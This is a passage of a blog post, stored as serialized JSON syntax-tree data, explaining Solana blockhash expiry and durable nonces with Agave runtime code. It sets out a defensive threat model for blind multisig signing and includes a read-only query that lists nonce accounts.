MAX_PROCESSING_AGE",{"type":27,"tag":207,"props":74980,"children":74981},{"style":226},[74982],{"type":33,"value":736},{"type":27,"tag":207,"props":74984,"children":74985},{"style":8920},[74986],{"type":33,"value":21008},{"type":27,"tag":207,"props":74988,"children":74989},{"style":226},[74990],{"type":33,"value":229},{"type":27,"tag":207,"props":74992,"children":74993},{"style":238},[74994],{"type":33,"value":74995}," MAX_RECENT_BLOCKHASHES ",{"type":27,"tag":207,"props":74997,"children":74998},{"style":226},[74999],{"type":33,"value":980},{"type":27,"tag":207,"props":75001,"children":75002},{"style":232},[75003],{"type":33,"value":438},{"type":27,"tag":207,"props":75005,"children":75006},{"style":238},[75007],{"type":33,"value":241},{"type":27,"tag":36,"props":75009,"children":75010},{},[75011,75013,75020,75022,75028],{"type":33,"value":75012},"For those curious, the logic ",{"type":27,"tag":47,"props":75014,"children":75017},{"href":75015,"rel":75016},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L61",[51],[75018],{"type":33,"value":75019},"starts here",{"type":33,"value":75021}," and is quite straightforward to follow, ending in a ",{"type":27,"tag":84,"props":75023,"children":75025},{"className":75024},[],[75026],{"type":33,"value":75027},"is_hash_index_valid",{"type":33,"value":75029}," check.",{"type":27,"tag":101,"props":75031,"children":75033},{"className":10270,"code":75032,"language":10269,"meta":7,"style":7},"fn is_hash_index_valid(last_hash_index: u64, max_age: usize, hash_index: u64) -> bool {\n last_hash_index - hash_index \u003C= max_age as u64\n}\n",[75034],{"type":27,"tag":84,"props":75035,"children":75036},{"__ignoreMap":7},[75037,75116,75150],{"type":27,"tag":207,"props":75038,"children":75039},{"class":209,"line":210},[75040,75044,75049,75053,75058,75062,75066,75070,75075,75079,75083,75087,75092,75096,75100,75104,75108,75112],{"type":27,"tag":207,"props":75041,"children":75042},{"style":214},[75043],{"type":33,"value":27538},{"type":27,"tag":207,"props":75045,"children":75046},{"style":1335},[75047],{"type":33,"value":75048}," is_hash_index_valid",{"type":27,"tag":207,"props":75050,"children":75051},{"style":238},[75052],{"type":33,"value":1343},{"type":27,"tag":207,"props":75054,"children":75055},{"style":220},[75056],{"type":33,"value":75057},"last_hash_index",{"type":27,"tag":207,"props":75059,"children":75060},{"style":226},[75061],{"type":33,"value":736},{"type":27,"tag":207,"props":75063,"children":75064},{"style":8920},[75065],{"type":33,"value":13142},{"type":27,"tag":207,"props":75067,"children":75068},{"style":238},[75069],{"type":33,"value":1123},{"type":27,"tag":207,"props":75071,"children":75072},{"style":220},[75073],{"type":33,"value":75074},"max_age",{"type":27,"tag":207,"props":75076,"children":75077},{"style":226},[75078],{"type":33,"value":736},{"type":27,"tag":207,"props":75080,"children":75081},{"style":8920},[75082],{"type":33,"value":21008},{"type":27,"tag":207,"props":75084,"children":75085},{"style":238},[75086],{"type":33,"value":1123},{"type":27,"tag":207,"props":75088,"children":75089},{"style":220},[75090],{"type":33,"value":75091},"hash_index",{"type":27,"tag":207,"props":75093,"children":75094},{"style":226},[75095],{"type":33,"value":736},{"type":27,"tag":207,"props":75097,"children":75098},{"style":8920},[75099],{"type":33,"value":13142},{"type":27,"tag":207,"props":75101,"children":75102},{"style":238},[75103],{"type":33,"value":2222},{"type":27,"tag":207,"props":75105,"children":75106},{"style":226},[75107],{"type":33,"value":8968},{"type":27,"tag":207,"props":75109,"children":75110},{"style":8920},[75111],{"type":33,"value":19327},{"type":27,"tag":207,"props":75113,"children":75114},{"style":238},[75115],{"type":33,"value":384},{"type":27,"tag":207,"props":75117,"children":75118},{"class":209,"line":244},[75119,75124,75128,75133,75137,75142,75146],{"type":27,"tag":207,"props":75120,"children":75121},{"style":220},[75122],{"type":33,"value":75123}," last_hash_index",{"type":27,"tag":207,"props":75125,"children":75126},{"style":226},[75127],{"type":33,"value":544},{"type":27,"tag":207,"props":75129,"children":75130},{"style":220},[75131],{"type":33,"value":75132}," hash_index",{"type":27,"tag":207,"props":75134,"children":75135},{"style":226},[75136],{"type":33,"value":15478},{"type":27,"tag":207,"props":75138,"children":75139},{"style":220},[75140],{"type":33,"value":75141}," max_age",{"type":27,"tag":207,"props":75143,"children":75144},{"style":214},[75145],{"type":33,"value":16108},{"type":27,"tag":207,"props":75147,"children":75148},{"style":8920},[75149],{"type":33,"value":20474},{"type":27,"tag":207,"props":75151,"children":75152},{"class":209,"line":270},[75153],{"type":27,"tag":207,"props":75154,"children":75155},{"style":238},[75156],{"type":33,"value":451},{"type":27,"tag":36,"props":75158,"children":75159},{},[75160],{"type":33,"value":75161},"One important consequence is that any signed transaction has a natural expiration of around a few minutes.",{"type":27,"tag":10222,"props":75163,"children":75164},{},[75165],{"type":27,"tag":36,"props":75166,"children":75167},{},[75168,75170],{"type":33,"value":75169},"Since slots (aka the time period a validator can produce a block) are configured to last about 400ms, but may fluctuate between 400ms and 600ms, ",{"type":27,"tag":12606,"props":75171,"children":75172},{},[75173],{"type":33,"value":75174},"a given blockhash can only be used by transactions for about 60 to 90 seconds before it will be considered expired by the runtime.",{"type":27,"tag":36,"props":75176,"children":75177},{},[75178,75180,75185],{"type":33,"value":75179},"This means an attacker ",{"type":27,"tag":942,"props":75181,"children":75182},{},[75183],{"type":33,"value":75184},"must use",{"type":33,"value":75186}," a malicious signed transaction within a short timeframe.",{"type":27,"tag":58,"props":75188,"children":75190},{"id":75189},"durable-nonce",[75191],{"type":33,"value":75192},"Durable Nonce",{"type":27,"tag":36,"props":75194,"children":75195},{},[75196,75198,75205],{"type":33,"value":75197},"The second type of signature ",{"type":27,"tag":47,"props":75199,"children":75202},{"href":75200,"rel":75201},"https://solana.com/developers/guides/advanced/introduction-to-durable-nonces",[51],[75203],{"type":33,"value":75204},"is a durable nonce",{"type":33,"value":75206},". These were created to solve the very feature (or problem) mentioned above: short expiration time.",{"type":27,"tag":10222,"props":75208,"children":75209},{},[75210],{"type":27,"tag":36,"props":75211,"children":75212},{},[75213,75215],{"type":33,"value":75214},"durable nonces provide an opportunity to create and sign a transaction that can be submitted at any point in the future, and much more. ",{"type":27,"tag":12606,"props":75216,"children":75217},{},[75218],{"type":33,"value":75219},"This opens up a wide range of use cases that are otherwise not possible or too difficult to implement",{"type":27,"tag":36,"props":75221,"children":75222},{},[75223,75225,75232],{"type":33,"value":75224},"If we examine the code ",{"type":27,"tag":47,"props":75226,"children":75229},{"href":75227,"rel":75228},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L104",[51],[75230],{"type":33,"value":75231},"for recent blockhash validation",{"type":33,"value":75233},", we can also see the handling for durable nonces.",{"type":27,"tag":101,"props":75235,"children":75237},{"className":10270,"code":75236,"language":10269,"meta":7,"style":7}," let recent_blockhash = tx.message().recent_blockhash();\n if let Some(hash_info) = hash_queue.get_hash_info_if_valid(recent_blockhash, max_age) {\n Ok(CheckedTransactionDetails {\n nonce: None,\n lamports_per_signature: hash_info.lamports_per_signature(),\n })\n } else if let Some((nonce, previous_lamports_per_signature)) = self\n .check_load_and_advance_message_nonce_account(\n tx.message(),\n next_durable_nonce,\n next_lamports_per_signature,\n )\n {\n Ok(CheckedTransactionDetails {\n nonce: Some(nonce),\n lamports_per_signature: previous_lamports_per_signature,\n })\n } else {\n error_counters.blockhash_not_found += 1;\n Err(TransactionError::BlockhashNotFound)\n }\n",[75238],{"type":27,"tag":84,"props":75239,"children":75240},{"__ignoreMap":7},[75241,75288,75354,75374,75394,75424,75432,75486,75503,75523,75535,75547,75555,75562,75581,75608,75628,75635,75650,75680,75709],{"type":27,"tag":207,"props":75242,"children":75243},{"class":209,"line":210},[75244,75248,75253,75257,75262,75266,75271,75275,75279,75284],{"type":27,"tag":207,"props":75245,"children":75246},{"style":214},[75247],{"type":33,"value":10290},{"type":27,"tag":207,"props":75249,"children":75250},{"style":220},[75251],{"type":33,"value":75252}," recent_blockhash",{"type":27,"tag":207,"props":75254,"children":75255},{"style":226},[75256],{"type":33,"value":229},{"type":27,"tag":207,"props":75258,"children":75259},{"style":220},[75260],{"type":33,"value":75261}," tx",{"type":27,"tag":207,"props":75263,"children":75264},{"style":226},[75265],{"type":33,"value":1041},{"type":27,"tag":207,"props":75267,"children":75268},{"style":1335},[75269],{"type":33,"value":75270},"message",{"type":27,"tag":207,"props":75272,"children":75273},{"style":238},[75274],{"type":33,"value":21155},{"type":27,"tag":207,"props":75276,"children":75277},{"style":226},[75278],{"type":33,"value":1041},{"type":27,"tag":207,"props":75280,"children":75281},{"style":1335},[75282],{"type":33,"value":75283},"recent_blockhash",{"type":27,"tag":207,"props":75285,"children":75286},{"style":238},[75287],{"type":33,"value":4301},{"type":27,"tag":207,"props":75289,"children":75290},{"class":209,"line":244},[75291,75295,75299,75303,75307,75312,75316,75320,75325,75329,75334,75338,75342,75346,75350],{"type":27,"tag":207,"props":75292,"children":75293},{"style":376},[75294],{"type":33,"value":19556},{"type":27,"tag":207,"props":75296,"children":75297},{"style":214},[75298],{"type":33,"value":34570},{"type":27,"tag":207,"props":75300,"children":75301},{"style":8920},[75302],{"type":33,"value":34575},{"type":27,"tag":207,"props":75304,"children":75305},{"style":238},[75306],{"type":33,"value":1343},{"type":27,"tag":207,"props":75308,"children":75309},{"style":220},[75310],{"type":33,"value":75311},"hash_info",{"type":27,"tag":207,"props":75313,"children":75314},{"style":238},[75315],{"type":33,"value":2222},{"type":27,"tag":207,"props":75317,"children":75318},{"style":226},[75319],{"type":33,"value":10380},{"type":27,"tag":207,"props":75321,"children":75322},{"style":220},[75323],{"type":33,"value":75324}," hash_queue",{"type":27,"tag":207,"props":75326,"children":75327},{"style":226},[75328],{"type":33,"value":1041},{"type":27,"tag":207,"props":75330,"children":75331},{"style":1335},[75332],{"type":33,"value":75333},"get_hash_info_if_valid",{"type":27,"tag":207,"props":75335,"children":75336},{"style":238},[75337],{"type":33,"value":1343},{"type":27,"tag":207,"props":75339,"children":75340},{"style":220},[75341],{"type":33,"value":75283},{"type":27,"tag":207,"props":75343,"children":75344},{"style":238},[75345],{"type":33,"value":1123},{"type":27,"tag":207,"props":75347,"children":75348},{"style":220},[75349],{"type":33,"value":75074},{"type":27,"tag":207,"props":75351,"children":75352},{"style":238},[75353],{"type":33,"value":1424},{"type":27,"tag":207,"props":75355,"children":75356},{"class":209,"line":270},[75357,75361,75365,75370],{"type":27,"tag":207,"props":75358,"children":75359},{"style":8920},[75360],{"type":33,"value":22087},{"type":27,"tag":207,"props":75362,"children":75363},{"style":238},[75364],{"type":33,"value":1343},{"type":27,"tag":207,"props":75366,"children":75367},{"style":8920},[75368],{"type":33,"value":75369},"CheckedTransactionDetails",{"type":27,"tag":207,"props":75371,"children":75372},{"style":238},[75373],{"type":33,"value":384},{"type":27,"tag":207,"props":75375,"children":75376},{"class":209,"line":296},[75377,75382,75386,75390],{"type":27,"tag":207,"props":75378,"children":75379},{"style":220},[75380],{"type":33,"value":75381}," nonce",{"type":27,"tag":207,"props":75383,"children":75384},{"style":226},[75385],{"type":33,"value":736},{"type":27,"tag":207,"props":75387,"children":75388},{"style":8920},[75389],{"type":33,"value":35023},{"type":27,"tag":207,"props":75391,"children":75392},{"style":238},[75393],{"type":33,"value":1842},{"type":27,"tag":207,"props":75395,"children":75396},{"class":209,"line":445},[75397,75402,75406,75411,75415,75420],{"type":27,"tag":207,"props":75398,"children":75399},{"style":220},[75400],{"type":33,"value":75401}," lamports_per_signature",{"type":27,"tag":207,"props":75403,"children":75404},{"style":226},[75405],{"type":33,"value":736},{"type":27,"tag":207,"props":75407,"children":75408},{"style":220},[75409],{"type":33,"value":75410}," hash_info",{"type":27,"tag":207,"props":75412,"children":75413},{"style":226},[75414],{"type":33,"value":1041},{"type":27,"tag":207,"props":75416,"children":75417},{"style":1335},[75418],{"type":33,"value":75419},"lamports_per_signature",{"type":27,"tag":207,"props":75421,"children":75422},{"style":238},[75423],{"type":33,"value":10778},{"type":27,"tag":207,"props":75425,"children":75426},{"class":209,"line":867},[75427],{"type":27,"tag":207,"props":75428,"children":75429},{"style":238},[75430],{"type":33,"value":75431}," })\n",{"type":27,"tag":207,"props":75433,"children":75434},{"class":209,"line":892},[75435,75439,75443,75447,75451,75455,75459,75464,75468,75473,75477,75481],{"type":27,"tag":207,"props":75436,"children":75437},{"style":238},[75438],{"type":33,"value":23054},{"type":27,"tag":207,"props":75440,"children":75441},{"style":376},[75442],{"type":33,"value":10605},{"type":27,"tag":207,"props":75444,"children":75445},{"style":376},[75446],{"type":33,"value":23063},{"type":27,"tag":207,"props":75448,"children":75449},{"style":214},[75450],{"type":33,"value":34570},{"type":27,"tag":207,"props":75452,"children":75453},{"style":8920},[75454],{"type":33,"value":34575},{"type":27,"tag":207,"props":75456,"children":75457},{"style":238},[75458],{"type":33,"value":38783},{"type":27,"tag":207,"props":75460,"children":75461},{"style":220},[75462],{"type":33,"value":75463},"nonce",{"type":27,"tag":207,"props":75465,"children":75466},{"style":238},[75467],{"type":33,"value":1123},{"type":27,"tag":207,"props":75469,"children":75470},{"style":220},[75471],{"type":33,"value":75472},"previous_lamports_per_signature",{"type":27,"tag":207,"props":75474,"children":75475},{"style":238},[75476],{"type":33,"value":16117},{"type":27,"tag":207,"props":75478,"children":75479},{"style":226},[75480],{"type":33,"value":10380},{"type":27,"tag":207,"props":75482,"children":75483},{"style":214},[75484],{"type":33,"value":75485}," self\n",{"type":27,"tag":207,"props":75487,"children":75488},{"class":209,"line":1475},[75489,75494,75499],{"type":27,"tag":207,"props":75490,"children":75491},{"style":226},[75492],{"type":33,"value":75493}," .",{"type":27,"tag":207,"props":75495,"children":75496},{"style":1335},[75497],{"type":33,"value":75498},"check_load_and_advance_message_nonce_account",{"type":27,"tag":207,"props":75500,"children":75501},{"style":238},[75502],{"type":33,"value":9090},{"type":27,"tag":207,"props":75504,"children":75505},{"class":209,"line":2065},[75506,75511,75515,75519],{"type":27,"tag":207,"props":75507,"children":75508},{"style":220},[75509],{"type":33,"value":75510}," tx",{"type":27,"tag":207,"props":75512,"children":75513},{"style":226},[75514],{"type":33,"value":1041},{"type":27,"tag":207,"props":75516,"children":75517},{"style":1335},[75518],{"type":33,"value":75270},{"type":27,"tag":207,"props":75520,"children":75521},{"style":238},[75522],{"type":33,"value":10778},{"type":27,"tag":207,"props":75524,"children":75525},{"class":209,"line":2092},[75526,75531],{"type":27,"tag":207,"props":75527,"children":75528},{"style":220},[75529],{"type":33,"value":75530}," next_durable_nonce",{"type":27,"tag":207,"props":75532,"children":75533},{"style":238},[75534],{"type":33,"value":1842},{"type":27,"tag":207,"props":75536,"children":75537},{"class":209,"line":2130},[75538,75543],{"type":27,"tag":207,"props":75539,"children":75540},{"style":220},[75541],{"type":33,"value":75542}," next_lamports_per_signature",{"type":27,"tag":207,"props":75544,"children":75545},{"style":238},[75546],{"type":33,"value":1842},{"type":27,"tag":207,"props":75548,"children":75549},{"class":209,"line":2168},[75550],{"type":27,"tag":207,"props":75551,"children":75552},{"style":238},[75553],{"type":33,"value":75554}," )\n",{"type":27,"tag":207,"props":75556,"children":75557},{"class":209,"line":4095},[75558],{"type":27,"tag":207,"props":75559,"children":75560},{"style":238},[75561],{"type":33,"value":36449},{"type":27,"tag":207,"props":75563,"children":75564},{"class":209,"line":4103},[75565,75569,75573,75577],{"type":27,"tag":207,"props":75566,"children":75567},{"style":8920},[75568],{"type":33,"value":22087},{"type":27,"tag":207,"props":75570,"children":75571},{"style":238},[75572],{"type":33,"value":1343},{"type":27,"tag":207,"props":75574,"children":75575},{"style":8920},[75576],{"type":33,"value":75369},{"type":27,"tag":207,"props":75578,"children":75579},{"style":238},[75580],{"type":33,"value":384},{"type":27,"tag":207,"props":75582,"children":75583},{"class":209,"line":4154},[75584,75588,75592,75596,75600,75604],{"type":27,"tag":207,"props":75585,"children":75586},{"style":220},[75587],{"type":33,"value":75381},{"type":27,"tag":207,"props":75589,"children":75590},{"style":226},[75591],{"type":33,"value":736},{"type":27,"tag":207,"props":75593,"children":75594},{"style":8920},[75595],{"type":33,"value":34575},{"type":27,"tag":207,"props":75597,"children":75598},{"style":238},[75599],{"type":33,"value":1343},{"type":27,"tag":207,"props":75601,"children":75602},{"style":220},[75603],{"type":33,"value":75463},{"type":27,"tag":207,"props":75605,"children":75606},{"style":238},[75607],{"type":33,"value":14018},{"type":27,"tag":207,"props":75609,"children":75610},{"class":209,"line":4203},[75611,75615,75619,75624],{"type":27,"tag":207,"props":75612,"children":75613},{"style":220},[75614],{"type":33,"value":75401},{"type":27,"tag":207,"props":75616,"children":75617},{"style":226},[75618],{"type":33,"value":736},{"type":27,"tag":207,"props":75620,"children":75621},{"style":220},[75622],{"type":33,"value":75623}," previous_lamports_per_signature",{"type":27,"tag":207,"props":75625,"children":75626},{"style":238},[75627],{"type":33,"value":1842},{"type":27,"tag":207,"props":75629,"children":75630},{"class":209,"line":4249},[75631],{"type":27,"tag":207,"props":75632,"children":75633},{"style":238},[75634],{"type":33,"value":75431},{"type":27,"tag":207,"props":75636,"children":75637},{"class":209,"line":4290},[75638,75642,75646],{"type":27,"tag":207,"props":75639,"children":75640},{"style":238},[75641],{"type":33,"value":23054},{"type":27,"tag":207,"props":75643,"children":75644},{"style":376},[75645],{"type":33,"value":10605},{"type":27,"tag":207,"props":75647,"children":75648},{"style":238},[75649],{"type":33,"value":384},{"type":27,"tag":207,"props":75651,"children":75652},{"class":209,"line":4304},[75653,75658,75662,75667,75672,75676],{"type":27,"tag":207,"props":75654,"children":75655},{"style":220},[75656],{"type":33,"value":75657}," error_counters",{"type":27,"tag":207,"props":75659,"children":75660},{"style":226},[75661],{"type":33,"value":1041},{"type":27,"tag":207,"props":75663,"children":75664},{"style":238},[75665],{"type":33,"value":75666},"blockhash_not_found ",{"type":27,"tag":207,"props":75668,"children":75669},{"style":226},[75670],{"type":33,"value":75671},"+=",{"type":27,"tag":207,"props":75673,"children":75674},{"style":232},[75675],{"type":33,"value":235},{"type":27,"tag":207,"props":75677,"children":75678},{"style":238},[75679],{"type":33,"value":241},{"type":27,"tag":207,"props":75681,"children":75682},{"class":209,"line":5466},[75683,75687,75691,75696,75700,75705],{"type":27,"tag":207,"props":75684,"children":75685},{"style":8920},[75686],{"type":33,"value":22129},{"type":27,"tag":207,"props":75688,"children":75689},{"style":238},[75690],{"type":33,"value":1343},{"type":27,"tag":207,"props":75692,"children":75693},{"style":8920},[75694],{"type":33,"value":75695},"TransactionError",{"type":27,"tag":207,"props":75697,"children":75698},{"style":226},[75699],{"type":33,"value":10768},{"type":27,"tag":207,"props":75701,"children":75702},{"style":8920},[75703],{"type":33,"value":75704},"BlockhashNotFound",{"type":27,"tag":207,"props":75706,"children":75707},{"style":238},[75708],{"type":33,"value":10449},{"type":27,"tag":207,"props":75710,"children":75711},{"class":209,"line":5530},[75712],{"type":27,"tag":207,"props":75713,"children":75714},{"style":238},[75715],{"type":33,"value":10645},{"type":27,"tag":36,"props":75717,"children":75718},{},[75719],{"type":33,"value":75720},"The documentation does a good job of explaining how they work.",{"type":27,"tag":10222,"props":75722,"children":75723},{},[75724],{"type":27,"tag":36,"props":75725,"children":75726},{},[75727],{"type":33,"value":75728},"Durable Transaction Nonces, which are 32-byte in length (usually represented as base58 encoded strings), are used in place of recent blockhashes to make every transaction unique (to avoid double-spending) while removing the mortality on the unexecuted transaction.",{"type":27,"tag":36,"props":75730,"children":75731},{},[75732,75734,75741],{"type":33,"value":75733},"Durable nonces are created and managed ",{"type":27,"tag":47,"props":75735,"children":75738},{"href":75736,"rel":75737},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/programs/system/src/system_processor.rs#L446",[51],[75739],{"type":33,"value":75740},"by the system program",{"type":33,"value":75742},". They don't have a fixed PDA, so each account can have multiple associated nonces.",{"type":27,"tag":36,"props":75744,"children":75745},{},[75746,75748,75755],{"type":33,"value":75747},"After a durable nonce is used, it'll be \"advanced\" to preventing replay attacks. The new nonce is calculated ",{"type":27,"tag":47,"props":75749,"children":75752},{"href":75750,"rel":75751},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L81",[51],[75753],{"type":33,"value":75754},"based on the current blockhash",{"type":33,"value":75756},", and cannot be predicted in advance.",{"type":27,"tag":101,"props":75758,"children":75760},{"className":10270,"code":75759,"language":10269,"meta":7,"style":7}," let hash_queue = self.blockhash_queue.read().unwrap();\n let last_blockhash = hash_queue.last_hash();\n let next_durable_nonce = DurableNonce::from_blockhash(&last_blockhash);\n",[75761],{"type":27,"tag":84,"props":75762,"children":75763},{"__ignoreMap":7},[75764,75816,75849],{"type":27,"tag":207,"props":75765,"children":75766},{"class":209,"line":210},[75767,75771,75775,75779,75783,75787,75792,75796,75800,75804,75808,75812],{"type":27,"tag":207,"props":75768,"children":75769},{"style":214},[75770],{"type":33,"value":10290},{"type":27,"tag":207,"props":75772,"children":75773},{"style":220},[75774],{"type":33,"value":75324},{"type":27,"tag":207,"props":75776,"children":75777},{"style":226},[75778],{"type":33,"value":229},{"type":27,"tag":207,"props":75780,"children":75781},{"style":214},[75782],{"type":33,"value":21073},{"type":27,"tag":207,"props":75784,"children":75785},{"style":226},[75786],{"type":33,"value":1041},{"type":27,"tag":207,"props":75788,"children":75789},{"style":238},[75790],{"type":33,"value":75791},"blockhash_queue",{"type":27,"tag":207,"props":75793,"children":75794},{"style":226},[75795],{"type":33,"value":1041},{"type":27,"tag":207,"props":75797,"children":75798},{"style":1335},[75799],{"type":33,"value":67872},{"type":27,"tag":207,"props":75801,"children":75802},{"style":238},[75803],{"type":33,"value":21155},{"type":27,"tag":207,"props":75805,"children":75806},{"style":226},[75807],{"type":33,"value":1041},{"type":27,"tag":207,"props":75809,"children":75810},{"style":1335},[75811],{"type":33,"value":10952},{"type":27,"tag":207,"props":75813,"children":75814},{"style":238},[75815],{"type":33,"value":4301},{"type":27,"tag":207,"props":75817,"children":75818},{"class":209,"line":244},[75819,75823,75828,75832,75836,75840,75845],{"type":27,"tag":207,"props":75820,"children":75821},{"style":214},[75822],{"type":33,"value":10290},{"type":27,"tag":207,"props":75824,"children":75825},{"style":220},[75826],{"type":33,"value":75827}," last_blockhash",{"type":27,"tag":207,"props":75829,"children":75830},{"style":226},[75831],{"type":33,"value":229},{"type":27,"tag":207,"props":75833,"children":75834},{"style":220},[75835],{"type":33,"value":75324},{"type":27,"tag":207,"props":75837,"children":75838},{"style":226},[75839],{"type":33,"value":1041},{"type":27,"tag":207,"props":75841,"children":75842},{"style":1335},[75843],{"type":33,"value":75844},"last_hash",{"type":27,"tag":207,"props":75846,"children":75847},{"style":238},[75848],{"type":33,"value":4301},{"type":27,"tag":207,"props":75850,"children":75851},{"class":209,"line":270},[75852,75856,75861,75865,75870,75874,75879,75883,75887,75892],{"type":27,"tag":207,"props":75853,"children":75854},{"style":214},[75855],{"type":33,"value":10290},{"type":27,"tag":207,"props":75857,"children":75858},{"style":220},[75859],{"type":33,"value":75860}," next_durable_nonce",{"type":27,"tag":207,"props":75862,"children":75863},{"style":226},[75864],{"type":33,"value":229},{"type":27,"tag":207,"props":75866,"children":75867},{"style":8920},[75868],{"type":33,"value":75869}," DurableNonce",{"type":27,"tag":207,"props":75871,"children":75872},{"style":226},[75873],{"type":33,"value":10768},{"type":27,"tag":207,"props":75875,"children":75876},{"style":1335},[75877],{"type":33,"value":75878},"from_blockhash",{"type":27,"tag":207,"props":75880,"children":75881},{"style":238},[75882],{"type":33,"value":1343},{"type":27,"tag":207,"props":75884,"children":75885},{"style":226},[75886],{"type":33,"value":10398},{"type":27,"tag":207,"props":75888,"children":75889},{"style":220},[75890],{"type":33,"value":75891},"last_blockhash",{"type":27,"tag":207,"props":75893,"children":75894},{"style":238},[75895],{"type":33,"value":1455},{"type":27,"tag":36,"props":75897,"children":75898},{},[75899,75901,75906],{"type":33,"value":75900},"This has an important consequence for our threat model. Unlike recent blockhash transactions, durable nonce transactions ",{"type":27,"tag":942,"props":75902,"children":75903},{},[75904],{"type":33,"value":75905},"can",{"type":33,"value":75907}," be saved and reused.",{"type":27,"tag":28,"props":75909,"children":75911},{"id":75910},"threat-model",[75912],{"type":33,"value":75913},"Threat Model",{"type":27,"tag":36,"props":75915,"children":75916},{},[75917],{"type":33,"value":75918},"Let's consider a simplified form of the original question.",{"type":27,"tag":12719,"props":75920,"children":75921},{},[75922,75927,75932],{"type":27,"tag":1232,"props":75923,"children":75924},{},[75925],{"type":33,"value":75926},"We have a N/M multisig",{"type":27,"tag":1232,"props":75928,"children":75929},{},[75930],{"type":33,"value":75931},"Signers are unable to see what they're signing, both with respect to content and quantity of signatures. This is roughly equivalent to blind signing transactions.",{"type":27,"tag":1232,"props":75933,"children":75934},{},[75935],{"type":33,"value":75936},"We can accurately query chain state.",{"type":27,"tag":36,"props":75938,"children":75939},{},[75940],{"type":33,"value":75941},"Can we safely sign transactions?",{"type":27,"tag":36,"props":75943,"children":75944},{},[75945],{"type":33,"value":75946},"One observation is that this problem is very hard to solve with durable nonces. By signing durable nonce transactions, an attacker could collect signatures and replay them at some indeterminite future point.",{"type":27,"tag":36,"props":75948,"children":75949},{},[75950,75952,75958,75960,75967],{"type":33,"value":75951},"Durable nonces require an onchain account, and it's possible to use a ",{"type":27,"tag":84,"props":75953,"children":75955},{"className":75954},[],[75956],{"type":33,"value":75957},"getProgramAccounts",{"type":33,"value":75959}," call to validate if your signer ",{"type":27,"tag":47,"props":75961,"children":75964},{"href":75962,"rel":75963},"https://solana.stackexchange.com/questions/9650/is-there-any-way-to-get-nonce-accounts-of-an-authorized-account",[51],[75965],{"type":33,"value":75966},"has an associated durable nonce",{"type":33,"value":1041},{"type":27,"tag":101,"props":75969,"children":75971},{"className":43182,"code":75970,"language":43184,"meta":7,"style":7},"const connection = new Connection(clusterApiUrl('testnet'));\nconst nonceAccounts = await connection.getProgramAccounts(\n // The system program owns all nonce accounts.\n SYSTEM_PROGRAM_ADDRESS,\n {\n filters: [\n {\n // Nonce accounts are exactly 80 bytes long\n dataSize: 80,\n },\n {\n // The authority's 32-byte public key is written\n // into bytes 8-40 of the nonce's account data.\n memcmp: {\n bytes: AUTHORITY_PUBLIC_KEY.toBase58(),\n offset: 8,\n },\n },\n ],\n }\n);\n",[75972],{"type":27,"tag":84,"props":75973,"children":75974},{"__ignoreMap":7},[75975,76022,76058,76066,76078,76086,76098,76106,76114,76131,76138,76145,76153,76161,76173,76199,76216,76223,76230,76238,76245],{"type":27,"tag":207,"props":75976,"children":75977},{"class":209,"line":210},[75978,75982,75987,75991,75995,76000,76004,76009,76013,76018],{"type":27,"tag":207,"props":75979,"children":75980},{"style":214},[75981],{"type":33,"value":16931},{"type":27,"tag":207,"props":75983,"children":75984},{"style":220},[75985],{"type":33,"value":75986}," connection",{"type":27,"tag":207,"props":75988,"children":75989},{"style":226},[75990],{"type":33,"value":229},{"type":27,"tag":207,"props":75992,"children":75993},{"style":214},[75994],{"type":33,"value":1597},{"type":27,"tag":207,"props":75996,"children":75997},{"style":1335},[75998],{"type":33,"value":75999}," Connection",{"type":27,"tag":207,"props":76001,"children":76002},{"style":238},[76003],{"type":33,"value":1343},{"type":27,"tag":207,"props":76005,"children":76006},{"style":1335},[76007],{"type":33,"value":76008},"clusterApiUrl",{"type":27,"tag":207,"props":76010,"children":76011},{"style":238},[76012],{"type":33,"value":1343},{"type":27,"tag":207,"props":76014,"children":76015},{"style":1325},[76016],{"type":33,"value":76017},"'testnet'",{"type":27,"tag":207,"props":76019,"children":76020},{"style":238},[76021],{"type":33,"value":14505},{"type":27,"tag":207,"props":76023,"children":76024},{"class":209,"line":244},[76025,76029,76034,76038,76042,76046,76050,76054],{"type":27,"tag":207,"props":76026,"children":76027},{"style":214},[76028],{"type":33,"value":16931},{"type":27,"tag":207,"props":76030,"children":76031},{"style":220},[76032],{"type":33,"value":76033}," nonceAccounts",{"type":27,"tag":207,"props":76035,"children":76036},{"style":226},[76037],{"type":33,"value":229},{"type":27,"tag":207,"props":76039,"children":76040},{"style":376},[76041],{"type":33,"value":43461},{"type":27,"tag":207,"props":76043,"children":76044},{"style":220},[76045],{"type":33,"value":75986},{"type":27,"tag":207,"props":76047,"children":76048},{"style":238},[76049],{"type":33,"value":1041},{"type":27,"tag":207,"props":76051,"children":76052},{"style":1335},[76053],{"type":33,"value":75957},{"type":27,"tag":207,"props":76055,"children":76056},{"style":238},[76057],{"type":33,"value":9090},{"type":27,"tag":207,"props":76059,"children":76060},{"class":209,"line":270},[76061],{"type":27,"tag":207,"props":76062,"children":76063},{"style":4647},[76064],{"type":33,"value":76065}," // The system program owns all nonce accounts.\n",{"type":27,"tag":207,"props":76067,"children":76068},{"class":209,"line":296},[76069,76074],{"type":27,"tag":207,"props":76070,"children":76071},{"style":220},[76072],{"type":33,"value":76073}," SYSTEM_PROGRAM_ADDRESS",{"type":27,"tag":207,"props":76075,"children":76076},{"style":238},[76077],{"type":33,"value":1842},{"type":27,"tag":207,"props":76079,"children":76080},{"class":209,"line":445},[76081],{"type":27,"tag":207,"props":76082,"children":76083},{"style":238},[76084],{"type":33,"value":76085}," {\n",{"type":27,"tag":207,"props":76087,"children":76088},{"class":209,"line":867},[76089,76094],{"type":27,"tag":207,"props":76090,"children":76091},{"style":220},[76092],{"type":33,"value":76093}," filters:",{"type":27,"tag":207,"props":76095,"children":76096},{"style":238},[76097],{"type":33,"value":32886},{"type":27,"tag":207,"props":76099,"children":76100},{"class":209,"line":892},[76101],{"type":27,"tag":207,"props":76102,"children":76103},{"style":238},[76104],{"type":33,"value":76105}," 